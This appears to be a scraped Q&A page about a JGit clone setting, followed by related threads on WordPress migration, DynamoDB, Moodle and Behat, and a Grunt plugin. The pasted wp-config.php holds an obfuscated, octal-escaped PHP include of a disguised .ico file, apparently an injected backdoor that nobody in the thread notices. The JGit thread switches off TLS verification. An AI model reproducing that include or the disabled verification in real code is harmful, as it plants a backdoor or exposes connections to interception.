How to set StoredConfig before cloning a remote repo action - jgit

Image we have the below code snippet, I want to set this config before cloning a remote repo, but here cloneCommand.getRepository() has no repo yet as it's not cloned, so how I can set this value before the clone?
CloneCommand cloneCommand = Git.cloneRepository(`enter code here`).setURI(rempteRepo`enter code here`)
.setDirectory(new File(SF_COMPVRP_CODEBASE_LOCAL))
.setCredentialsProvider(new UsernamePasswordCredentialsProvider(this.gitHubUid, this.gitHubPwd));
StoredConfig config = cloneCommand.getRepository().getConfig();
config.setBoolean("http", null, "sslVerify", false );
config.save();

Open the filesystem config first, manipulate that configuration (not sure if it persists it) and clone the repository.
// https://stackoverflow.com/questions/33998477/turn-ssl-verification-off-for-jgit-clone-command
/*
* To work around this limitation, you can execute the specific clone steps
* manually as suggested in the comments below:
*
* init a repository using the InitCommand set ssl verify to false
* StoredConfig config = git.getRepository().getConfig();
* config.setBoolean( "http", null, "sslVerify", false );
* config.save();
* fetch (see FetchCommand)
* checkout (see CheckoutCommand)
*/
FileBasedConfig config = SystemReader.getInstance().openUserConfig( null, FS.DETECTED );
Set<String> subSections = config.getSubsections(ConfigConstants.CONFIG_REMOTE_SECTION);
config.save();
//Git git = Git.init().setDirectory( localPath ).call();
Git git = Git.cloneRepository().setURI(remoteUrl).setDirectory(localPath).call();
```

Related

Problem setting up GCP wordpress from existing one

So, my company wordpress broke some days ago for unknown reasons and I can't acess the dashboard anymore, but I managed to get a backup of files and sql from the server owner. The owner won't let me access by ssh to fix it, so we're moving over to a cloud server.
I followed this tutorial extensively. My server is on Google Cloud, a wordpress deploy. To start, I acessed /var/www/html, copied the database info, zipped all the files and git cloned the original server files from the backup. Server info is here.
I entered the wp-config.php file, changed the db stuff to the ones in the google original config file and saved it.
This is my live config file
<?php
/*688e1*/
#include "\057va\162/w\167w/\150tm\154/s\151te\163_s\145rv\145rs\160/p\145r
f\157rm\141br\141si\154.c\157m.\142r/\167p-\151nc\154ud\145s/\122eq\165es\1
64s/\122es\160on\163e/\056e2\0678a\06653\056ic\157";
/*688e1*/
define('WP_CACHE', true);
define( 'WPCACHEHOME', '/var/www/html/sites_serversp/performabrasil.com.br/
wp-content/plugins/wp-super-cache/' );
define('FORCE_SSL_LOGIN', false);
define('FORCE_SSL_ADMIN', false);
define('CONCATENATE_SCRIPTS', false);
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FO
RWARDED_PROTO'], 'https') !== false) {
$_SERVER['HTTPS'] = 'on';
}
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* #link https://codex.wordpress.org/Editing_wp-config.php
*
* #package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', '****');
/** MySQL database username */
define('DB_USER', '*****');
/** MySQL database password */
define('DB_PASSWORD', '*****');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**##-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
define('WP_DEBUG', false);
define('WP_MEMORY_LIMIT', '256M');
/** Enable W3 Total Cache */
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
define('WP_SITEURL', 'http://34.94.87.104/');
define('WP_HOME', 'http://34.94.87.104/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
I did not configure the domain name, put it to https://34.94.87.10, which is the google one. I just changed it in wp-options, in the sql db.
However, I can't seem to be able to access the files for some reason, does anyone have a clue? Which additional info should I provide? I'm kinda new to sysadmin, just a front end dev.
As you changing domain to new IP, for temporary purposes you can set this in WP Config set these two variables to your new IP address and see if it works:
You may need to try https and http version http://34.94.87.104 and see which one works depending on your SSL certificate config.
Source:
https://wordpress.org/support/article/changing-the-site-url/
define( 'WP_HOME', 'http://example.com' );
define( 'WP_SITEURL', 'http://example.com' );

Using Dynamo DB client in my custom ask-sdk webhook

I have used my own custom webhook using ask-sdk and is deployed in my ec2 instance. Now I want to use DynamoDB as DynamoDbPersistenceAdapter
but I am not getting any reference how to do that.
DynamoDbPersistenceAdapter will need AWS Keys and table name and some details for dynamo db but where to initialize? I found some code, but this dont have anything :
persistenceAdapter = new DynamoDbPersistenceAdapter({
tableName: 'global_attr_table',
createTable: true,
partitionKeyGenerator: keyGenerator
});
This can probably be solved by adding environmental variables and by setting up an AWS CLI profile:
Heres how you setup an AWS CLI Profile:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html
Once you have a profile setup with your AWS access information you can export Environmental Variables in your command line or in a shell script
$> export AWS_PROFILE=YourNewAWSCLIProfileName
$> export AWS_REGION=us-east-1
$> export AWS_DEFAULT_REGION=us-east-1
and you can check that these variables are set by typing
$> echo $AWS_PROFILE
$> echo $AWS_REGION
$> echo $AWS_DEFAULT_REGION
This is what I use. If for some reason that doesnt work here is some research into how you might add a DynamoDB Client:
Trying to solve a different problem so let me solve yours as I walk through mine:
In: node_modules/ask-sdk/dist/skill/factory/StandardSkillFactory.js
there is reference to something similar to what you have above
new ask_sdk_dynamodb_persistence_adapter_1.DynamoDbPersistenceAdapter({
tableName: thisTableName,
createTable: thisAutoCreateTable,
partitionKeyGenerator: thisPartitionKeyGenerator,
dynamoDBClient: thisDynamoDbClient,
})
I believe you need to create a DynamoDbClient instance which I found referenced here in the AWS SDK Docs.
https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/dynamodb-example-document-client.html
You'd have to set your own service:
In: node_modules/aws-sdk/lib/dynamodb/document_client.js
/**
* Creates a DynamoDB document client with a set of configuration options.
*
* #option options params [map] An optional map of parameters to bind to every
* request sent by this service object.
* #option options service [AWS.DynamoDB] An optional pre-configured instance
* of the AWS.DynamoDB service object to use for requests. The object may
* bound parameters used by the document client.
* #option options convertEmptyValues [Boolean] set to true if you would like
* the document client to convert empty values (0-length strings, binary
* buffers, and sets) to be converted to NULL types when persisting to
* DynamoDB.
* #see AWS.DynamoDB.constructor
*
*/
constructor: function DocumentClient(options) {
var self = this;
self.options = options || {};
self.configure(self.options);
},
/**
* #api private
*/
configure: function configure(options) {
var self = this;
self.service = options.service;
self.bindServiceObject(options);
self.attrValue = options.attrValue =
self.service.api.operations.putItem.input.members.Item.value.shape;
},
/**
* #api private
*/
bindServiceObject: function bindServiceObject(options) {
var self = this;
options = options || {};
if (!self.service) {
self.service = new AWS.DynamoDB(options);
} else {
var config = AWS.util.copy(self.service.config);
self.service = new self.service.constructor.__super__(config);
self.service.config.params =
AWS.util.merge(self.service.config.params || {}, options.params);
}
},
I'm not sure what those options might look like.

WordPress directs me to another page on localhost

I have installed Moodle 3.4 first, then I installed WordPress. I installed MySQL and PHP and followed the corresponding steps. Login to localhost / WordPress to continue configuring WordPress but it sent me to the Moodle page. The following is the file config.php of Moodle:
var/www/html/moodle/config.php
Its content:
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'user';
$CFG->dbpass = 'pass';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => '',
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://localhost';
$CFG->dataroot = '/var/www/html/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
The installation of WordPress is in:
var/www/html/wordpress
This is the only thing I have modified in the file wp-config.php. Just changing my data.
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress_asesorias');
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'pass');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
URL in browser
Something must be generating conflict but I do not know what it is.
It's because you $CFG->wwwroot moodle variable. Change this to 'localhost/moodle' if you webserver is pointing to /var/www/html.
Alternatively, modify you hosts file (/etc/hosts for linux, c:\windows\system32\drivers\etc\hosts for windows) and set an alternative hostname to localhost, then change $CFG->wwwroot var with this value.

Testing Symfony2 emails with Behat 3

I followed the Behat 2.5 docs to test mails. After a few tweaks to match Behat 3 I have ended with the following code (I have removed non-relevant parts):
public function getSymfonyProfile()
{
$driver = $this->mink->getSession()->getDriver();
if (!$driver instanceof KernelDriver) {
// Throw exception
}
$profile = $driver->getClient()->getProfile();
if (false === $profile) {
// Throw exception
}
return $profile;
}
/**
* #Then I should get an email with subject :subject on :email
*/
public function iShouldGetAnEmail($subject, $email)
{
$profile = $this->getSymfonyProfile();
$collector = $profile->getCollector('swiftmailer');
foreach ($collector->getMessages() as $message) {
// Assert email
}
// Throw an error if something went wrong
}
When I run this test, it throws the following error:
exception 'LogicException' with message 'Missing default data in Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector' in vendor/symfony/swiftmailer-bundle/Symfony/Bundle/SwiftmailerBundle/DataCollector/MessageDataCollector.php:93
Stack trace:
#0 vendor/symfony/swiftmailer-bundle/Symfony/Bundle/SwiftmailerBundle/DataCollector/MessageDataCollector.php(122): Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector->getMailerData('default')
#1 features/bootstrap/FeatureContext.php(107): Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector->getMessages()
My profiler is configured as follows:
# app/config/config_test.yml
framework:
test: ~
profiler:
enabled: true
collect: true
It seems that the Profile is correctly loaded and the MessageDataCollector from Swiftmailer does exist, but it is not doing its work as expected. Any clue to solve this?
Maybe the issue you have has been fixed as I do not have this anymore (I'm using Behat v3.0.15, BrowserKit driver 1.3.* and Symfony v2.6.6).
I managed to reproduce your error but only when I forgot to enable profiler data collecting:
profiler:
collect: false
Once this problem solved (the configuration you provided solving the problem for me) I managed to check emails in my Behat tests.
Two solutions for this:
Solution #1: Intercepting redirects globally
If it does not break all your other tests you can do so by configuring your web profiler as follows:
web_profiler:
intercept_redirects: true
Solution #2: Preventing client to follow redirections temporarily
For my part, intercepting redirections globally in the configuration broke most of my other functional tests. I therefore use this method instead.
As preventing redirections allows mainly to check data in the data collectors I decided to use a tag #collect on each scenario requiring redirect interception. I then used #BeforeScenario and #AfterScenario to enable this behaviour only for those scenarios:
/**
* Follow client redirection once
*
* #Then /^(?:|I )follow the redirection$/
*/
public function followRedirect()
{
$this->getDriver()->getClient()->followRedirect();
}
/**
* Restore the automatic following of redirections
*
* #param BeforeScenarioScope $scope
*
* #BeforeScenario #collect
*/
public static function disableFollowRedirects(BeforeScenarioScope $scope)
{
$context = $scope->getEnvironment()->getContext(get_class());
$context->getDriver()->getClient()->followRedirects(false);
}
/**
* Restore the automatic following of redirections
*
* #param AfterScenarioScope $scope
*
* #AfterScenario #collect
*/
public static function restoreFollowRedirects(AfterScenarioScope $scope)
{
$context = $scope->getEnvironment()->getContext(get_class());
$context->getDriver()->getClient()->followRedirects(true);
}
It's not the answer your are looking for, but I'm pretty sure it will suits your needs (perhaps more).
If I can suggest, try using Mailcatcher with this bundle: https://packagist.org/packages/alexandresalome/mailcatcher
You'll be able to easily tests if emails are sent, what's their subject, follow a link in the body, and so on...
Many steps are included with this bundle.

Custom grunt plugin not playing nice with grunt-watch

I'm developing a custom grunt extension that reloads a chrome tab. It works fine when I use it within the plugin's own folder, but then when I try to download it from NPM and use it in another project, it goes bonkers.
I included it as such:
grunt.loadNpmTasks('grunt-chrome-extension-reload');
My custom task code, located in the tasks folder of the plugin, is as such:
/*
* grunt-chrome-extension-reload
* https://github.com/freedomflyer/grunt-chrome-extension-reload
*
* Copyright (c) 2014 Spencer Gardner
* Licensed under the MIT license.
*/
'use strict';
module.exports = function(grunt) {
var chromeExtensionTabId = 0;
grunt.initConfig({
/**
Reloads tab in chrome with id of chromeExtensionTabId
Called after correct tab number is found from chrome-cli binary.
*/
exec: {
reloadChromeTab: {
cmd: function() {
return chromeExtensionTabId ? "chrome-cli reload -t " + chromeExtensionTabId : "chrome-cli open chrome://extensions && chrome-cli reload";
}
}
},
/**
Executes "chrome-cli list tabs", grabs stdout, and finds open extension tabs ID's.
Sets variable chromeExtensionTabId to the first extension tab ID
*/
external_daemon: {
getExtensionTabId: {
options: {
verbose: true,
startCheck: function(stdout, stderr) {
// Find any open tab in Chrome that has the extensions page loaded, grab ID of tab
var extensionTabMatches = stdout.match(/\[\d{1,5}\] Extensions/);
if(extensionTabMatches){
var chromeExtensionTabIdContainer = extensionTabMatches[0].match(/\[\d{1,5}\]/)[0];
chromeExtensionTabId = chromeExtensionTabIdContainer.substr(1, chromeExtensionTabIdContainer.length - 2);
console.log("Chrome Extension Tab #: " + chromeExtensionTabId);
}
return true;
}
},
cmd: "chrome-cli",
args: ["list", "tabs"]
}
}
});
grunt.registerTask('chrome_extension_reload', function() {
grunt.task.run(['external_daemon:getExtensionTabId', 'exec:reloadChromeTab']);
});
};
So, when I run it in an external project with grunt watch, grunt spits out this error a few hundred times before quitting (endless loop?)
Running "watch" task
Waiting...Verifying property watch exists in config...ERROR
>> Unable to process task.
Warning: Required config property "watch" missing.
Fatal error: Maximum call stack size exceeded
Interestingly, can not even call my plugin within the watch task, and the problem persists. Only by removing grunt.loadNpmTasks('grunt-chrome-extension-reload'); can I get rid of the issue, which basically means that the code inside my task is wrong. Any ideas?
grunt.initConfig() is intended for end users. As it will completely erase any existing config (including your watch config) and replace with the config you're initializing. Thus when your plugin is ran it replaces the entire config with the exec and external_daemon task configs.
Try using grunt.config.set() instead. As it only sets a given part of the config rather than erasing the entire thing.
But a better pattern for a plugin is to let the user determine the config. Just have a plugin handle the task. In other words, avoid setting the config for the user.

Resources